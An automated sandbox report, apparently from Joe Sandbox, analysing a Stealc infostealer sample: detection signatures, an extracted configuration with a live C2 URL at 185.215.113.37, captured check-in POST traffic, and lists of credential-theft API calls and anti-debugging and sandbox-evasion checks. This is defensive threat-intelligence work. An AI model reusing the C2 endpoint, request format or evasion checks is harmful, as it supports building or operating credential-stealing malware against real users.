Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1540694
MD5:	c85bd4b2ad207a44d2cf47f0b48d6d09
SHA1:	3d20ea5592b7742bf5a05c166aa3e18c9d187681
SHA256:	294ee8a1545ecad7c74a8994fd7cd56acbdf3694ee80a77ba33e12c0067717d7
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.340000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0034C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00347240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00347240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00349AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00349AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00349B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00349B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00358EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00358EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00354910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0034E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0034ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00354570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00353EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003416D0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 38 37 31 34 44 39 39 42 30 32 31 32 32 35 36 38 36 33 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="hwid"8E8714D99B021225686314------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="build"doma------JJECGCBGDBKJJKEBFBFH--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00344880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00344880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 38 37 31 34 44 39 39 42 30 32 31 32 32 35 36 38 36 33 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="hwid"8E8714D99B021225686314------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="build"doma------JJECGCBGDBKJJKEBFBFH--

Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37=

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4	0_2_007010F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006070F3	0_2_006070F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EC9B5	0_2_005EC9B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00632A96	0_2_00632A96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0071035F	0_2_0071035F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005B43DE	0_2_005B43DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00711BD7	0_2_00711BD7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707C29	0_2_00707C29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005B34C6	0_2_005B34C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0060BCC8	0_2_0060BCC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076ACA0	0_2_0076ACA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00648DAB	0_2_00648DAB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C0D8F	0_2_006C0D8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007EDE77	0_2_007EDE77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070966C	0_2_0070966C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00704625	0_2_00704625
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007A17DD	0_2_007A17DD

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 003445C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: xisdcata ZLIB complexity 0.9949372386961908

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: file.exe, 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00359600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00353720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00353720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\T1OZWGAW.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1809408 > 1048576

Source: file.exe

Static PE information: Raw size of xisdcata is bigger than: 0x100000 < 0x193a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xisdcata:EW;bazuxvkp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xisdcata:EW;bazuxvkp:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00359860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1c5de1 should be: 0x1c6936

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: xisdcata
Source: file.exe	Static PE information: section name: bazuxvkp
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0035B035 push ecx; ret	0_2_0035B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076D012 push eax; mov dword ptr [esp], edx	0_2_0076D05A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076D012 push 7FECB9A0h; mov dword ptr [esp], edx	0_2_0076D081
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E7014 push 55D365F6h; mov dword ptr [esp], esi	0_2_007E707D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E7014 push 31CB389Bh; mov dword ptr [esp], edx	0_2_007E7114
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 4CED349Fh; mov dword ptr [esp], ebx	0_2_00701113
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 4CC958F3h; mov dword ptr [esp], ecx	0_2_0070111D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push eax; mov dword ptr [esp], edx	0_2_007012F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push eax; mov dword ptr [esp], edx	0_2_00701314
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebx; mov dword ptr [esp], edx	0_2_0070137C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 38C6E934h; mov dword ptr [esp], esi	0_2_007013CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], 2AD17891h	0_2_00701428
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edx; mov dword ptr [esp], 56D69300h	0_2_00701497
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edx; mov dword ptr [esp], esi	0_2_007014D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], edi	0_2_00701518
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 6DFF3FD2h; mov dword ptr [esp], esp	0_2_00701535
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 4F8DFF09h	0_2_007015EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 6C6DF282h; mov dword ptr [esp], ebx	0_2_00701743
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 3680CF58h; mov dword ptr [esp], ecx	0_2_0070174B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 5EEFCDE9h	0_2_007017CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push esi; mov dword ptr [esp], ebx	0_2_007017F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 3DFBA0E5h	0_2_007017FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 4CB923CBh	0_2_0070181A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push esi; mov dword ptr [esp], 7B2D27BAh	0_2_0070184F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], esi	0_2_007018E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 0FD4743Eh; mov dword ptr [esp], edi	0_2_0070198D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ecx; mov dword ptr [esp], edx	0_2_00701A77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebx; mov dword ptr [esp], 6E5BD191h	0_2_00701AFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 397CBF65h; mov dword ptr [esp], eax	0_2_00701B85
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edx; mov dword ptr [esp], 16EDE921h	0_2_00701C3D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 3657D360h; mov dword ptr [esp], ebx	0_2_00701CAC

Source: file.exe

Static PE information: section name: xisdcata entropy: 7.953663128653993

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A2269 second address: 5A2286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94618479h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A2286 second address: 5A228A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715A53 second address: 715A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push edi 0x0000000b jp 00007FCA94618468h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715A76 second address: 715A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715A7C second address: 715A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715D74 second address: 715D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715EB6 second address: 715EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCA94618466h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71879C second address: 718833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E43h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, B2F7h 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D3700h] 0x0000001a push CF2C7F56h 0x0000001f jmp 00007FCA94C93E3Dh 0x00000024 add dword ptr [esp], 30D3812Ah 0x0000002b mov si, 2FFCh 0x0000002f push 00000003h 0x00000031 mov dx, 6C48h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FCA94C93E38h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 ja 00007FCA94C93E3Ch 0x00000057 mov ecx, esi 0x00000059 push 00000003h 0x0000005b mov dword ptr [ebp+122D17EFh], eax 0x00000061 push C0CF035Ch 0x00000066 jl 00007FCA94C93E4Bh 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 718911 second address: 718915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 718915 second address: 71891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71891F second address: 718923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
